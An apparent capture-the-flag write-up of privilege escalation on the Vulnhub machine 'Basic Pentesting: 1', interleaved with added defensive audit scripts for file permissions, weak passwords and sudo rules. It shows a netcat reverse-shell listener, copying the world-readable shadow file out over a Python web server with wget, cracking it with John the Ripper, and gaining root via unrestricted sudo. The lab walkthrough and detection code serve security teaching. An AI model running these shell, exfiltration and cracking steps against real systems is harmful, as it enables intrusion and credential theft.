This post shows the privilege escalation walkthrough for the machine Basic Pentesting: 1 on Vulnhub.
Link for the machine: https://www.vulnhub.com/entry/basic-pentesting-1,216/
So we got a reverse shell from WordPress (by uploading a custom plugin containing a reverse shell).
root@kali:~/basic# nc -l -v -p 8886
listening on [any] 8886 ...
connect to [192.168.56.4] from vtcesc [192.168.56.101] 55232
Linux vtcsec 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
05:46:51 up 6:54, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
marlinsp tty7 :0 03:43 6:54m 1:10 0.08s /sbin/upstart --user
marlinsp pts/2 192.168.56.4 03:47 1:58m 0.07s 0.01s sshd: marlinspike [priv]
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
We are logged in as www-data
$ /bin/bash -i
bash: cannot set terminal process group (1236): Inappropriate ioctl for device
bash: no job control in this shell
www-data@vtcsec:/$
www-data@vtcsec:/$
So both the passwd and shadow files are world-readable (not good), and the listing shows passwd is even world-writable.
www-data@vtcsec:/$ cd /etc
cd /etc
www-data@vtcsec:/etc$ ls -alrth | grep passwd
ls -alrth | grep passwd
-rw------- 1 root root 2.4K Nov 16 2017 passwd-
-rw-rw-rw- 1 root root 2.4K Nov 16 2017 passwd
www-data@vtcsec:/etc$ ls -alrth | grep shadow
ls -alrth | grep shadow
-rw------- 1 root root 871 Nov 14 2017 gshadow-
-rw-r----- 1 root shadow 881 Nov 16 2017 gshadow
-rw------- 1 root root 1.3K Nov 16 2017 shadow-
-rw-r--r-- 1 root shadow 1.3K Nov 16 2017 shadow
www-data@vtcsec:/etc$
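The permissions above are the root cause of everything that follows: on a stock Ubuntu host passwd is root:root 0644 and shadow is root:shadow 0640, so the 0666 passwd and 0644 shadow seen here are a misconfiguration a defender can catch with a simple mode check. The following audit script is an added example, not part of the original walkthrough or of the Vulnhub machine; it compares the two files against those expected maximum modes and, for a self-contained run, recreates the target's modes in a temporary directory (a constructed sample, not the real /etc).

```python
import os
import stat
import tempfile

# Maximum permission bits for the account databases on a stock Ubuntu host:
# passwd is world-readable but writable only by its owner (root, 0644);
# shadow must not be readable by "other" at all (root:shadow, 0640).
EXPECTED_MODES = {"passwd": 0o644, "shadow": 0o640}


def excess_bits(path, max_mode):
    """Return the permission bits set on path that go beyond max_mode."""
    return stat.S_IMODE(os.stat(path).st_mode) & ~max_mode


def describe(bits):
    """Translate excess mode bits into findings, most severe first."""
    findings = []
    if bits & stat.S_IWOTH:
        findings.append("world-writable")
    if bits & stat.S_IROTH:
        findings.append("world-readable")
    if bits & stat.S_IWGRP:
        findings.append("group-writable")
    if bits & stat.S_IRGRP:
        findings.append("group-readable")
    if bits & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        findings.append("executable")
    return findings


def audit_account_files(etc_dir="/etc", expected_uid=0):
    """Audit passwd and shadow under etc_dir; returns {name: [findings]}.

    Only files with at least one finding appear in the result.
    """
    report = {}
    for name, max_mode in EXPECTED_MODES.items():
        path = os.path.join(etc_dir, name)
        findings = describe(excess_bits(path, max_mode))
        if os.stat(path).st_uid != expected_uid:
            findings.append("not owned by expected uid")
        if findings:
            report[name] = findings
    return report


def demo():
    """Recreate the modes seen on the target (0666 passwd, 0644 shadow)
    in a throwaway directory and audit them. Constructed sample, not /etc."""
    with tempfile.TemporaryDirectory() as etc:
        for name, mode in (("passwd", 0o666), ("shadow", 0o644)):
            path = os.path.join(etc, name)
            with open(path, "w") as fh:
                fh.write("placeholder\n")
            os.chmod(path, mode)
        # The temp files belong to the current user, so compare against that
        # uid here; on a real host keep the default expected_uid=0 (root).
        return audit_account_files(etc, expected_uid=os.getuid())


if __name__ == "__main__":
    for name, findings in demo().items():
        print(f"{name}: {', '.join(findings)}")
```

On a real host call `audit_account_files()` with the defaults as root; an empty result means both files match the expected modes and owner. The fix on the target is `chmod 644 /etc/passwd` and `chmod 640 /etc/shadow`.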
Running a Python HTTP server on the target machine to serve the files
www-data@vtcsec:/etc$ python -m SimpleHTTPServer
python -m SimpleHTTPServer
Transferring the passwd and shadow files to the Kali Linux machine
root@kali:~/basic# wget http://192.168.56.101:8000/passwd
--2019-07-22 05:49:51-- http://192.168.56.101:8000/passwd
Connecting to 192.168.56.101:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2364 (2.3K) [application/octet-stream]
Saving to: 'passwd.1'
passwd 100%[==================================================================================>] 2.31K --.-KB/s in 0s
2019-07-22 05:49:51 (272 MB/s) - 'passwd' saved [2364/2364]
root@kali:~/basic# wget http://192.168.56.101:8000/shadow
--2019-07-22 05:49:55-- http://192.168.56.101:8000/shadow
Connecting to 192.168.56.101:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1305 (1.3K) [application/octet-stream]
Saving to: 'shadow'
shadow 100%[==================================================================================>] 1.27K --.-KB/s in 0.006s
2019-07-22 05:49:55 (201 KB/s) - 'shadow' saved [1305/1305]
root@kali:~/basic#
Preparing the hash file for cracking with John the Ripper (unshadow merges passwd and shadow into the format john expects)
root@kali:~/basic# unshadow passwd shadow >password.txt
John found that the password is the same as the username
root@kali:~/basic# john password.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Wordlist
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 5 candidates buffered for the current salt, minimum 16
needed for performance.
marlinspike (marlinspike) >>>>>>>>>>>>
1g 0:00:00:00 DONE 1/3 (2019-07-22 03:42) 33.33g/s 166.6p/s 166.6c/s 166.6C/s marlinspike..marli
Use the "--show" option to display all of the cracked passwords reliably
Session completed
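John's single-crack mode found the password in under a second because it was the username, and the hash line reported "sha512crypt, crypt(3) $6$". An administrator can run the same check proactively against shadow (or unshadow output) without a cracker. The script below is an added example, not from the original walkthrough: it contains a pure-Python implementation of the $6$ scheme (sha512crypt, per Ulrich Drepper's specification, checked against its published "Hello world!" test vector), then walks the records and flags empty passwords, non-$6$ legacy hashes, and any account whose password equals its username. The records it audits are constructed at run time (the marlinspike hash is generated from the page's finding; the salts, the root password and the $1$ legacy entry are placeholders, not the target's data).

```python
import hashlib

# Alphabet and output byte order from the sha512crypt specification
# (Ulrich Drepper, "Unix crypt using SHA-256 and SHA-512").
B64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
PERM = [(0, 21, 42), (22, 43, 1), (44, 2, 23), (3, 24, 45), (25, 46, 4),
        (47, 5, 26), (6, 27, 48), (28, 49, 7), (50, 8, 29), (9, 30, 51),
        (31, 52, 10), (53, 11, 32), (12, 33, 54), (34, 55, 13), (56, 14, 35),
        (15, 36, 57), (37, 58, 16), (59, 17, 38), (18, 39, 60), (40, 61, 19),
        (62, 20, 41)]


def _b64_24bit(b2, b1, b0, n):
    """Encode a 24-bit word as n alphabet chars, low 6 bits first."""
    w = (b2 << 16) | (b1 << 8) | b0
    out = ""
    for _ in range(n):
        out += B64[w & 0x3F]
        w >>= 6
    return out


def _repeat_to(block, length):
    """Repeat a 64-byte digest and cut it to exactly `length` bytes."""
    return (block * (length // 64 + 1))[:length]


def sha512_crypt(password, salt, rounds=5000):
    """Pure-Python crypt(3) $6$ (sha512crypt), the scheme john reported."""
    pw, st, sha = password.encode(), salt.encode()[:16], hashlib.sha512
    b = sha(pw + st + pw).digest()                   # digest B
    a = sha(pw + st)                                 # digest A
    a.update(_repeat_to(b, len(pw)))
    i = len(pw)
    while i:                                         # bits of len(pw)
        a.update(b if i & 1 else pw)
        i >>= 1
    a = a.digest()
    p = _repeat_to(sha(pw * len(pw)).digest(), len(pw))       # P bytes
    s = _repeat_to(sha(st * (16 + a[0])).digest(), len(st))   # S bytes
    c = a
    for r in range(rounds):                          # cost loop
        h = sha(p if r & 1 else c)
        if r % 3:
            h.update(s)
        if r % 7:
            h.update(p)
        h.update(c if r & 1 else p)
        c = h.digest()
    enc = "".join(_b64_24bit(c[x], c[y], c[z], 4) for x, y, z in PERM)
    enc += _b64_24bit(0, 0, c[63], 2)
    prefix = "$6$" + (f"rounds={rounds}$" if rounds != 5000 else "")
    return prefix + st.decode() + "$" + enc


def parse_sha512crypt(field):
    """Split a $6$ hash field into (rounds, salt); None for other schemes."""
    parts = field.split("$")          # ['', '6', [rounds=N,] salt, hash]
    if len(parts) < 4 or parts[1] != "6":
        return None
    if parts[2].startswith("rounds="):
        return int(parts[2][7:]), parts[3]
    return 5000, parts[2]


def audit_accounts(lines, extra_candidates=()):
    """Flag empty, legacy-hashed, or username-equals-password accounts.

    lines: shadow (or unshadow) records. Returns {user: finding}.
    """
    findings = {}
    for line in lines:
        user, field = line.split(":", 2)[:2]
        if field == "":
            findings[user] = "empty password"
        elif field[0] in "!*":
            continue                                 # locked, nothing to test
        elif (parsed := parse_sha512crypt(field)) is None:
            findings[user] = "legacy hash algorithm"
        else:
            rounds, salt = parsed
            for cand in (user, *extra_candidates):
                if sha512_crypt(cand, salt, rounds) == field:
                    kind = "username" if cand == user else "common candidate"
                    findings[user] = "password equals " + kind
                    break
    return findings


def sample_lines():
    """Constructed unshadow-style records (not the target's real data)."""
    return [
        "root:" + sha512_crypt("Tr0ub4dor&3", "aQ3xLmZk") + ":0:0:root:/root:/bin/bash",
        "marlinspike:" + sha512_crypt("marlinspike", "k8Pq2sVb") + ":1000:1000::/home/marlinspike:/bin/bash",
        "www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin",
        "legacy:$1$abcdefgh$placeholderhashplaceholde:1001:1001::/home/legacy:/bin/sh",
        "guest::1002:1002::/home/guest:/bin/sh",
    ]


if __name__ == "__main__":
    for user, finding in audit_accounts(sample_lines()).items():
        print(f"{user}: {finding}")
```

`audit_accounts` only tests the username (plus any candidates you pass in `extra_candidates`), so it is a policy check, not a cracker; running it from a root cron job against /etc/shadow catches exactly the weakness john exploited here. The pure-Python $6$ routine exists so the check works on Python 3.13+, where the stdlib `crypt` module was removed.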
Remember that the SSH service is open.
Log in via SSH as marlinspike with the recovered password
root@kali:~/basic# ssh marlinspike@192.168.56.101
The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established.
ECDSA key fingerprint is SHA256:VpmqtJLBtzleV/ibg84tX0hax9+PC3nojkEOPOVhdJU.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts.
marlinspike@192.168.56.101's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.10.0-28-generic x86_64)
- Documentation: https://help.ubuntu.com
- Management: https://landscape.canonical.com
- Support: https://ubuntu.com/advantage
marlinspike@vtcsec:~$
marlinspike@vtcsec:~$ sudo -l
password for marlinspike:
Matching Defaults entries for marlinspike on vtcsec:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User marlinspike may run the following commands on vtcsec:
(ALL : ALL) ALL >>>>>>>>>>>
Everything is open: the rule (ALL : ALL) ALL lets marlinspike run any command as any user via sudo, so root is one command away.
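Reviewing `sudo -l` output by eye works for one host; across a fleet you want the rule lines parsed and the unrestricted ones flagged. The parser below is an added example, not part of the original walkthrough: it extracts each rule after the "may run the following commands" header into its run-as user, run-as group, tags (such as NOPASSWD) and command list, then reports rules that grant ALL commands as root or as ALL. The sample it runs on is a constructed copy of the target's output with one additional, properly restricted rule added for contrast (that second rule is made up, not from the machine).

```python
import re

# One rule line of `sudo -l` output:
# "(runas_user[ : runas_group]) [TAG: ...] command, command"
RULE_RE = re.compile(
    r"^\((?P<user>[^:)]+?)\s*(?::\s*(?P<group>[^)]+?))?\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)


def parse_sudo_l(output):
    """Return the rules listed after 'may run the following commands'."""
    rules, in_rules = [], False
    for raw in output.splitlines():
        line = raw.strip()
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue                      # continuation or unknown line
        rules.append({
            "runas_user": m["user"].strip(),
            "runas_group": (m["group"] or "").strip() or None,
            "tags": [t.rstrip(":") for t in m["tags"].split()],
            "commands": [c.strip() for c in m["cmds"].split(",")],
        })
    return rules


def unrestricted_rules(rules):
    """Rules that let the caller run any command as root (or as anyone)."""
    return [r for r in rules
            if "ALL" in r["commands"] and r["runas_user"] in ("ALL", "root")]


# Constructed copy of the output seen on the target, plus one invented
# restricted rule (the systemctl/journalctl line) to show the contrast.
SAMPLE_OUTPUT = """\
Matching Defaults entries for marlinspike on vtcsec:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User marlinspike may run the following commands on vtcsec:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/systemctl restart apache2, /usr/bin/journalctl
"""

if __name__ == "__main__":
    for r in unrestricted_rules(parse_sudo_l(SAMPLE_OUTPUT)):
        print("unrestricted:", r)
```

The remediation on the target is to replace the blanket rule in /etc/sudoers with the specific commands marlinspike actually needs; the parser then returns an empty list from `unrestricted_rules`.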
marlinspike@vtcsec:~$ sudo sh
# id
uid=0(root) gid=0(root) groups=0(root)
# id;date;whoami;hostname
uid=0(root) gid=0(root) groups=0(root)
Mon Jul 22 03:48:44 EDT 2019
root
vtcsec
Keep Learning 🙂